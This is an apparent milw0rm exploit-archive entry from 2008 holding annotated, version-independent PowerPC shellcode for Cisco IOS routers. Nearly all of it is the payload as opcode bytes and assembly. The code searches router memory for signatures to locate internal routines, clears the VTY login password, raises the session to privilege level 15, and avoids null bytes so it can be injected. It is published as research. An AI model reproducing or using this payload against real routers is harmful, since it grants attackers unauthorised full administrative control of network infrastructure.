83 lines
No EOL
3.5 KiB
Text
83 lines
No EOL
3.5 KiB
Text
# Version-independent IOS shellcode, Andy Davis 2008
|
|
#
|
|
# No hard-coded IOS addresses required
|
|
#
|
|
# The technique uses 4-byte signatures near references to the
|
|
# required addresses within the IOS "text" memory region.
|
|
# The addresses are then recovered from memory and used within the
|
|
# shellcode.
|
|
#
|
|
# This is beta 1 - this code can be highly optimised I'm sure,
|
|
# for example, the search routine could be reused and the number
|
|
# of registers cleared could be reduced - but it works :-)
|
|
#
|
|
# As this is the first iteration of this shellcode, I'm not making any
|
|
# claims as to exactly how portable it is - it has been tested on a
|
|
# number of IOS images and therefore, the concept has been demonstrated.
|
|
#
|
|
# Various simple techniques have been used to ensure that there are
|
|
# no nulls in the shellcode
|
|
|
|
|
|
.equ sig_vty, 0x7F60B910 # signature for vty_info
|
|
.equ sig_kill, 0x639C8889 # signature for terminate()
|
|
.equ start, 0x80018001 # start of the search
|
|
|
|
|
|
3c 80 80 02 lis r4,-32766
|
|
38 84 80 01 addi r4,r4,-32767 # the start address for the search
|
|
3c a0 63 9d lis r5,25501
|
|
38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature
|
|
38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls
|
|
(technique used throughout the shellcode)
|
|
38 e7 fe 70 addi r7,r7,-400
|
|
7c c4 38 6e l1: lwzux r6,r4,r7
|
|
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
|
|
40 82 ff f8 bne 18 <l1> # no, keep searching
|
|
7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill"
|
|
38 84 01 e8 addi r4,r4,488
|
|
38 84 fe 70 addi r4,r4,-400
|
|
7c c4 28 2e lwzx r6,r4,r5
|
|
38 a5 01 98 addi r5,r5,408
|
|
38 a5 fe 70 addi r5,r5,-400
|
|
7c c6 28 30 slw r6,r6,r5
|
|
7c c6 2c 30 srw r6,r6,r5
|
|
38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of
|
|
terminate() from here
|
|
7c 84 32 14 add r4,r4,r6 # add offset to current address
|
|
7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10
|
|
7c e7 3a 78 xor r7,r7,r7
|
|
3c a0 7f 61 lis r5,32609
|
|
38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature
|
|
38 e7 01 94 addi r7,r7,404
|
|
38 e7 fe 70 addi r7,r7,-400
|
|
7c c4 38 6e l2: lwzux r6,r4,r7
|
|
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
|
|
40 82 ff f8 bne 64 <l2> # no, keep searching
|
|
38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty"
|
|
38 84 fe 70 addi r4,r4,-400
|
|
7c e7 3a 78 xor r7,r7,r7
|
|
7c a4 38 2e lwzx r5,r4,r7 # get two MSBs
|
|
38 a5 ff ff addi r5,r5,-1
|
|
7d 08 42 78 xor r8,r8,r8
|
|
39 08 01 a0 addi r8,r8,416
|
|
39 08 fe 70 addi r8,r8,-400
|
|
7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000)
|
|
38 84 01 94 addi r4,r4,404
|
|
38 84 fe 70 addi r4,r4,-400
|
|
7c c4 38 2e lwzx r6,r4,r7 # get two LSBs
|
|
7c c6 40 30 slw r6,r6,r8
|
|
7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY)
|
|
7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY)
|
|
38 a5 01 08 addi r5,r5,264 # move to the 66th element of the
|
|
array (VTY 0 - see IOS "systat" command)
|
|
7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info
|
|
90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password
|
|
38 e7 ff ff addi r7,r7,-1
|
|
39 08 09 1a addi r8,r8,2330
|
|
90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15
|
|
7c e3 3b 78 mr r3,r7
|
|
7d 49 03 a6 mtctr r10
|
|
4e 80 04 20 bctr # terminate "this process"
|
|
|
|
# milw0rm.com [2008-08-21] |